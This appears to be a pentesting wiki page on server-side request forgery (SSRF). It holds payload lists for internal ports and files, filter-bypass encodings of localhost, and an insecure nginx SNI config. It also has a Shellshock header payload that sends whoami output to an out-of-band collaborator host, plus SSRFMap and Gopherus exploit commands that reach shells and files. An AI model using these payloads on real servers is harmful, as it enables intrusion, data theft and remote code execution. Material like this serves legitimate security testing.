SSRF (Server-Side Request Forgery)

Theory

A Server-Side Request Forgery (a.k.a. SSRF) is a web vulnerability allowing attackers to make the server-side application do certain requests. This vulnerability can lead to unauthorized actions, Sensitive Information Disclosure and even RCE (Remote Code Execution).

SSRF is to file inclusion since both vulnerabilities can be exploited to access external or internal content. The difference resides in the fact that file inclusion vulnerabilities rely on code inclusion functions (e.g. include() in PHP) while SSRF ones on functions that only handle data (e.g. file_get_contents(), fopen(), fread(), fsockopen(), curl_exec() in PHP), meaning file inclusion vulnerabilities will usually lead to RCE much more easily that SSRF ones.

Practice

Testers need to find input vectors and fields that could be used for publishing or importing data from a URL (e.g. GET and POST parameters).

With http://some.website/index.php?url=https://someother.website/index.php, and url being the vulnerable parameter, the following basic payloads can help a tester fetch content of files, scan ports, access filtered resources and so on.

file://PATH/TO/FILE
http://127.0.0.1:80/admin
http://127.0.0.1:80
http://127.0.0.1:22
ldap://127.0.0.1:389/%0astats%0aquit
dict://{attacker_url}:11111/
sftp://{attacker_url}:11111/
tftp://{attacker_url}:12346/TESTUDPPACKET

To scan for a specific range of private IP addresses (other than localhost), Use burp suite intruder that can fetch all of IP addresses in the internal network that is targeted.

Bypassing filters

In order to conduct SSRF attacks properly, there may be use cases where filters need to be bypassed

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can bypass the filter using various techniques :

Using an alternative IP representation such as :

http://127.1
http://0
http:@0/
http://0.0.0.0:80
http://[::]:80/
http://[0000::1]:80/
http://2130706433 # Decimal version of localhost
http://0x7f000001/ # Hexadecimal version of localhost

Obfuscating string using URL encoded, even double URL encoded sometimes.
Registered your own domain name that resolved the localhost IP address.

The following "URL Format Bypass" cheatsheet gives lots of examples to bypass filters: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

Blind SSRF vulnerabilities

A blind SSRF vulnerability is a type of vulnerability that arises when an application makes a request to an external resource using user-supplied input, but the application does not return the response to the user.

It can be achieved to gain full RCE (Remote Command Execution).

In order to identify a potential SSRF vulnerability and exploit, multiple tools can be used to pingback the request and see the response.

Burp Suite Collaborator
pingb
canarytokens
interactsh
webhook
ssrf-sheriff
An extension to add to Burp Suite, called "collaborator everywhere", that adds non-invasive payloads into outgoing HTTP requests' headers in order to detect SSRF vulnerabilities if and when the target pingbacks to the collaborator endpoint.

An effective way to abuse blind SSRF is to combine it with a shellshock vulnerability (CVE-2014-6271). See the following resource for more details: PortSwigger Lab: Blind SSRF with shellshock. The "collaborator everywhere" extension can be used to detect and abuse this as well.

SSRF via SNI data from certificate

The configuration below is insecure and allows to connect to an arbitrary backend, since the SNI field value is used directly as the address of the backend.

stream {
    server {
        listen 443; 
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;       
        ssl_preread on;
    }
}

With this insecure configuration, it is possible to exploit the SSRF vulnerability simply by specifying the desired IP or domain name in the SNI field. For example, the following command would force the server to connect to internal.host.com:

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlfbash

More information about this on Hacktricks.

SSRF with Command Injection

It is possible to use SSRF that return the command output inside an out of band connection as follows.

url=http://zad8nb8tb7dst2yohw0br7rr6ich07ow.oastify.com?`whoami`
User-Agent: () { :; }; /bin/nslookup $(whoami).zad8nb8tb7dst2yohw0br7rr6ich07ow.oastify.com

SSRFMap (Python) is a tool used to ease the exploitation of SSRFs. Gopherus (Python) can be used as well to gain RCE (Remote Code Execution) by generating Gopher payloads.

# using SSRFMap
python3 ssrfmap.py -r data/request.txt -p url -m readfiles

# using Gopherus
gopherus --exploit mysql # It only asks username of the MySQL user
	 --exploit postgresql # It only asks username of the Postgres user and database name
	 --exploit fastcgi # It only asks for a file which must be present in the victim system(preferable .php file)
	 --exploit redis # Get a reverse or php shell to overwrite the file in the system
	 --exploit zabbix # If port 10050 is open and EnableRemoteCommands = 1, then it is possible to run shell command
	 --exploit pymemcache # Python deserialization issue that lead to RCE
	 --exploit rbmemcache # Ruby deserialization issue that lead to RCE
	 --exploit phpmemcache # PHP deserialization issue that lead to RCE
	 --exploit dmpmemcache # Dump memory cache content
	 --exploit smtp # If port 25 is open and we can access it then, we can send message to anyone as victim user by generating email payload